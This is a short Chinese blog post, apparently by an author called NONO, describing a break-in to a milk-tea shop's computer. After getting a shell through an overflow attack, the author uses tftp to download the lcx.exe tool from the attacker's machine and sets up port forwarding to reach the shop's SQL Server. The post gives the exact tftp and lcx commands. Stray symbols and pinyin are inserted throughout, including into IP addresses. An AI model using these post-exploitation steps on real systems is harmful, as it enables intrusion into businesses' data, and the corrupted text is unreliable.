這(zhè)幾天在滲透一(yī)家(jiā)奶茶店(diàn)≈↓Ω的(de)時(shí)候, 使用(yòng)溢出攻擊獲得(de)了(le↕₹)奶茶店(diàn)shell, 截屏以後發現(xiàn)該電(diàn)腦(¶&nǎo)有(yǒu)安裝sqlserver, 但(dàn)是(shì)數(shù)據庫無法''®↓遠(yuǎn)程連接, 所以我決定使用(yòng)端口映射工(gōng✘∑₹♥)具突破端口連接限制(zhì);
我的(de)機(jī)器(qì)地(dì)址為(wèi):192.Ω¶♥≥168.1.156
奶茶店(diàn)的(de)IP地(dì)址為(wèi): 192.168.1.157
1:上(shàng)傳lcx到(dào)目标機(jī)器(qì)
首先需要(yào)下(xià)載lcx這(zhè)個(gè)工(gōng)具:
Lcx這(zhè)個(gè)工(gōng)具我使用(y✘↔òng)tftp上(shàng)傳到(dào)目标機(jī)器(qì), 在目™Ω标的(de)shell中執行(xíng):
tftp -i 192.168.1.156 get lcx.exe
2:使用(yòng)lcx監聽(tīng)本地(dì)端口
然後執行(xíng)lcx命令, 并綁定 本地(÷♥™dì)的(de)1434端口和(hé)51端口 :
lcx -listen 51 1434
3:在目标shell中執行(xíng)端口轉發
目标機(jī)器(qì)的(de)地(dì)址是(shì≈λ')192.168.1.157 , 我的(de)機(jī)器(qì)地(dì)址為(wèi)1®★<δ92.168.1.156:
lcx -slave 192.168.1.156 51 192.168.1.157 1433
這(zhè)條命令會(huì)把目标機(jī)器(ε∞≠qì)的(de)1433端口轉發到(dào) 192.168.1.156的(de)51端≈★口上(shàng)
使用(yòng)sqlservermanager¥↓→連接本地(dì)機(jī)器(qì), 連接的(de)地(dì)址為π•(wèi)本地(dì)機(jī)器(qì)IP的(de)1433端口:
OVER, 連接成功
作(zuò)者: NONO
出處:http://www.cnblogs.com/diligenceday/∏★™→
企業(yè)網站(zhàn):/
開(kāi)源博客:http://www.github.com/sqqihao
QQ:287101329
微(wēi)信:18101055830
